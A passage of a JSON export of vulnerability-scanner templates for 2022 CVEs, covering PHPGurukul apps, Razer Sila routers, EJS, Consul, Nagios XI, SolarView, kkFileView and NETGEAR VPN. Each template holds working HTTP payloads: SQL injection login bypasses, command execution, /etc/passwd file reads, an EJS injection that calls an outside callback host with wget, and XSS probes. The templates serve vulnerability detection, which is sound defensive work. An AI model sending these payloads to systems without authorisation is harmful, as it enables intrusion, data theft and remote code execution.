}, { "_id": { "$oid": "66477a413521042ccf308505" }, "name": "CVE-2022-29007.yaml", "content": "id: CVE-2022-29007\n\ninfo:\n name: Dairy Farm Shop Management System 1.0 - SQL Injection\n author: TenBird\n severity: critical\n description: |\n Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50365\n - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29007\n - https://github.com/sudoninja-noob/CVE-2022-29007/blob/main/CVE-2022-29007.txt\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29007\n cwe-id: CWE-89\n epss-score: 0.15861\n epss-percentile: 0.95469\n cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: dairy_farm_shop_management_system\n tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /dfsms/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username=admin' or '1'='1&password=1&login=login\n - |\n GET /dfsms/add-category.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Add Product'\n - 'Admin'\n - 'DFSMS'\n condition: and\n\n - type: 
status\n status:\n - 200\n# digest: 4a0a004730450220552b4e4f1d6369c8da564385c27795297aaf3b1f860d3b125ab77765ac1032b60221009429073918c60b64bc35a1f86bcedf480353c7fc21d5f1363a841d0a24dd02d7:922c64590222798bb761d5b6d8e72950", "hash": "16d55049086a89662e33d11fc4a91228", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308506" }, "name": "CVE-2022-29009.yaml", "content": "id: CVE-2022-29009\n\ninfo:\n name: Cyber Cafe Management System 1.0 - SQL Injection\n author: TenBird\n severity: critical\n description: |\n Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50355\n - https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29009\n - https://github.com/sudoninja-noob/CVE-2022-29009/blob/main/CVE-2022-29009.txt\n - https://github.com/manas3c/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29009\n cwe-id: CWE-89\n epss-score: 0.21257\n epss-percentile: 0.96305\n cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: cyber_cafe_management_system\n tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /ccms/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n 
username=%27+Or+1--+-&password=1&login=\n - |\n GET /ccms/dashboard.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'CCMS Admin Dashboard'\n - 'CCMS ADMIN | Admin'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c4332b09e1cc097f4cca16a0121cafbffab109672f9245168e86edf8bf26a0c902210099acc93d9117952cce48b5e857f1d8151fc10df6beebece0164404381d30a846:922c64590222798bb761d5b6d8e72950", "hash": "1f88ca37122ea8aa69a3f1f921a2bb8f", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308507" }, "name": "CVE-2022-29013.yaml", "content": "id: CVE-2022-29013\n\ninfo:\n name: Razer Sila Gaming Router - Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.\n reference:\n - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29013\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29013\n cwe-id: CWE-78\n epss-score: 0.83254\n epss-percentile: 0.98361\n cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: razer\n product: sila_firmware\n tags: packetstorm,cve,cve2022,razer,sila,router\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/ubus/\"\n headers:\n Origin: \"{{RootURL}}\"\n Referer: \"{{ROotURL}}\"\n X-Requested-With: XMLHttpRequest\n body: |\n {\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'\n\n - type: word\n part: header\n words:\n - 
\"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207cbb58a7c97c66bfec2ae1b2ea9efe5dd2c11d2f9ce7517c4f72aa7e6508b86002204dbae1299fc556dc6cc9ac476fb7c9c775c572f5aff45a220b6738b28985bd35:922c64590222798bb761d5b6d8e72950", "hash": "b9ec0768f752b3f620c6043acf196345", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308508" }, "name": "CVE-2022-29014.yaml", "content": "id: CVE-2022-29014\n\ninfo:\n name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion\n author: edoardottt\n severity: high\n description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.\n remediation: |\n Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50864\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29014\n - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila\n - https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-29014\n epss-score: 0.77285\n epss-percentile: 0.98135\n cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: razer\n product: sila_firmware\n tags: cve,cve2022,edb,packetstorm,razer,lfi,router\n\nhttp:\n - raw:\n - |\n POST /ubus/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n {\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - 
\"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950", "hash": "06f251cecf2af983cc1f81d2abe940c9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308509" }, "name": "CVE-2022-29078.yaml", "content": "id: CVE-2022-29078\n\ninfo:\n name: Node.js Embedded JavaScript 3.1.6 - Template Injection\n author: For3stCo1d\n severity: critical\n description: |\n Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n impact: |\n Remote code execution can lead to unauthorized access, data leakage, and complete system compromise.\n remediation: |\n Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability.\n reference:\n - https://eslam.io/posts/ejs-server-side-template-injection-rce/\n - https://github.com/miko550/CVE-2022-29078\n - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29078\n - https://github.com/mde/ejs/releases\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29078\n cwe-id: CWE-94\n epss-score: 0.34849\n epss-percentile: 0.97005\n cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: ejs\n product: ejs\n framework: node.js\n tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js\n\nhttp:\n - raw:\n - |\n GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s 
HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - http\n\n - type: word\n part: body\n words:\n - You are viewing page number\n# digest: 4a0a0047304502203db3f45d8e15e58d60c2a0c268f52014feead1fa99568158768c91a2580e313b022100efb19def318800319766279d5e0fbf144650bf5b861b85f3f6bfa291878bd107:922c64590222798bb761d5b6d8e72950", "hash": "aac512d273fdb362ebe3efeb25ea293b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850a" }, "name": "CVE-2022-29153.yaml", "content": "id: CVE-2022-29153\n\ninfo:\n name: HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery\n author: c-sh0\n severity: high\n description: |\n HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send crafted requests to internal resources, leading to unauthorized access or information disclosure.\n remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 
2) Fixed in 1.9.17, 1.10.10, and 1.11.5.\n reference:\n - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393\n - https://github.com/hashicorp/consul/pull/12685\n - https://developer.hashicorp.com/consul/docs/discovery/checks\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29153\n - https://discuss.hashicorp.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-29153\n cwe-id: CWE-918\n epss-score: 0.02376\n epss-percentile: 0.89603\n cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: hashicorp\n product: consul\n shodan-query: title:\"Consul by HashiCorp\"\n tags: cve,cve2022,consul,hashicorp,ssrf,intrusive\n\nhttp:\n - raw:\n - | # register safe test node\n PUT /v1/agent/check/register HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n - | # deregister test node\n PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - unknown field \"disable_redirects\"\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022100ad57775f28b340323e6c238f83d7ff7d527ca0f9ea5bad34f1516a2ced3e64c7022057c3fb9256242477b86e3a94db3ab1e5b0992646c61019b6e2eb284ae7e03696:922c64590222798bb761d5b6d8e72950", "hash": "72542f52d694256bcc73ca2c26304d39", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850b" }, "name": "CVE-2022-29272.yaml", "content": "id: CVE-2022-29272\n\ninfo:\n name: Nagios XI <5.8.5 - Open Redirect\n author: ritikchaddha\n severity: medium\n description: |\n Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability.\n reference:\n - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272\n - https://github.com/4LPH4-NL/CVEs\n - https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29272\n - https://assets.nagios.com/downloads/nagiosxi/CHANGES-5.TXT\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29272\n cwe-id: CWE-601\n epss-score: 0.0033\n epss-percentile: 0.67975\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: nagios\n product: nagios_xi\n tags: cve,cve2022,redirect,nagios,nagiosxi\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n extractors:\n - type: regex\n name: nsp_token\n group: 1\n regex:\n - ''\n - \"\"\n internal: true\n part: body\n# digest: 4a0a00473045022100cbdf04a44be30b745acc991c58c7b30bd5887bf49b11309c5a3e02a096fa0d0a0220210e11532a685f0239900f6aab1e5862ec23a6a9c30af08dda63ee08c7bd2ad2:922c64590222798bb761d5b6d8e72950", "hash": "3641032d6d7a7443cc98280d5e229c3a", 
"level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850c" }, "name": "CVE-2022-29298.yaml", "content": "id: CVE-2022-29298\n\ninfo:\n name: SolarView Compact 6.00 - Local File Inclusion\n author: ritikchaddha\n severity: high\n description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.\n reference:\n - https://www.exploit-db.com/exploits/50950\n - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view\n - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29298\n - https://github.com/20142995/pocsuite3\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-29298\n cwe-id: CWE-22\n epss-score: 0.1374\n epss-percentile: 0.95497\n cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: sv-cpt-mc310_firmware\n shodan-query: http.html:\"SolarView Compact\"\n tags: cve,cve2022,lfi,solarview,edb,contec\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950", "hash": "90fd79a845b302f072eb091339ebb2cd", "level": 5, "time": 
"2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850d" }, "name": "CVE-2022-29299.yaml", "content": "id: CVE-2022-29299\n\ninfo:\n name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting\n author: For3stCo1d\n severity: medium\n description: |\n SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://www.exploit-db.com/exploits/50967\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cve-id: CVE-2022-29299\n epss-score: 0.00175\n epss-percentile: 0.53704\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.favicon.hash:-244067125\n tags: cve2022,cve,xss,solarview,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<\"\">'\n - '/Solar_History.php\" METHOD=\"post\">'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950", "hash": 
"c471301011d14427a7fdb95c9ece3be7", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850e" }, "name": "CVE-2022-29301.yaml", "content": "id: CVE-2022-29301\n\ninfo:\n name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting\n author: For3stCo1d\n severity: high\n description: |\n SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact.\n reference:\n - https://www.exploit-db.com/exploits/50968\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cve-id: CVE-2022-29301\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.favicon.hash:-244067125\n tags: cve,cve2022,xss,solarview,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<\"\">'\n - 'SolarView'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d38ffbd6542c292bb1f0cc27a0f800b5723872c60c562f22a60f1da6b998c8d5022100a20ec0c2ea61b699dd97b70ca196faf415a635099331772a14498dcbac2b3839:922c64590222798bb761d5b6d8e72950", "hash": "a575bfc66124c5996ecddc4a840c0479", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850f" }, "name": "CVE-2022-29303.yaml", "content": "id: CVE-2022-29303\n\ninfo:\n name: SolarView 
Compact 6.00 - OS Command Injection\n author: badboycxcc\n severity: critical\n description: |\n SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.\n reference:\n - https://www.exploit-db.com/exploits/50940\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303\n - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing\n - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29303\n cwe-id: CWE-78\n epss-score: 0.9598\n epss-percentile: 0.99429\n cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: sv-cpt-mc310_firmware\n shodan-query: http.html:\"SolarView Compact\"\n tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec\nvariables:\n cmd: \"cat${IFS}/etc/passwd\"\n\nhttp:\n - raw:\n - |\n @timeout: 25s\n POST /conf_mail.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0\"\n\n - type: word\n part: body\n words:\n - \"p1_network_mail.cgi\"\n# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950", "hash": 
"538e0d117ca3f4678a806a46decbb9f7", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308510" }, "name": "CVE-2022-29349.yaml", "content": "id: CVE-2022-29349\n\ninfo:\n name: kkFileView 4.0.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/347\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29349\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29349\n cwe-id: CWE-79\n epss-score: 0.01698\n epss-percentile: 0.86444\n cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,kkFileView,xss,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'txt\">123'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008ef58e2fe8d3135a84c8de1c0e8768da7b5e0d6b8ad3771ae9495f44cdff423302201139897fc4641b2c9df1965cd6cefb0377632f5366b8f0e0c20be07316136cf0:922c64590222798bb761d5b6d8e72950", 
"hash": "4ba768ce756f1a0150be83eaf6a1e333", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308511" }, "name": "CVE-2022-29383.yaml", "content": "id: CVE-2022-29383\n\ninfo:\n name: NETGEAR ProSafe SSL VPN firmware - SQL Injection\n author: elitebaz\n severity: critical\n description: |\n NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383\n - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29383\n - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222\n - https://www.netgear.com/about/security/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29383\n cwe-id: CWE-89\n epss-score: 0.39819\n epss-percentile: 0.9716\n cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: netgear\n product: ssl312_firmware\n tags: cve2022,cve,sqli,netgear,router\n\nhttp:\n - raw:\n - |\n POST /scgi-bin/platform.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=utf-8\n\n thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n - |\n POST /scgi-bin/platform.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=utf-8\n\n 
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_1, \"User authentication Failed\")\n - contains(body_2, \"User Login Failed for SSLVPN User.\")\n condition: and\n# digest: 4a0a00473045022100f45d3739c471c0247ab5ddaef54f66b34aa714db5eed11fca164bde53a9d21d502207dba6b386eb95fb5189116296ed35657baa078f1332abcdf1f821b72666ba758:922c64590222798bb761d5b6d8e72950", "hash": "b26ab513fa8da58e7c336cb3c831f251", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308512" }, "name": "CVE-2022-29455.yaml", "content": "id: CVE-2022-29455\n\ninfo:\n name: WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting\n author: rotembar,daffainfo\n severity: medium\n description: |\n WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability.\n reference:\n - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor\n - https://www.rotem-bar.com/elementor\n - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-5-5-unauthenticated-dom-based-reflected-cross-site-scripting-xss-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29455\n - https://wordpress.org/plugins/elementor/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29455\n cwe-id: 
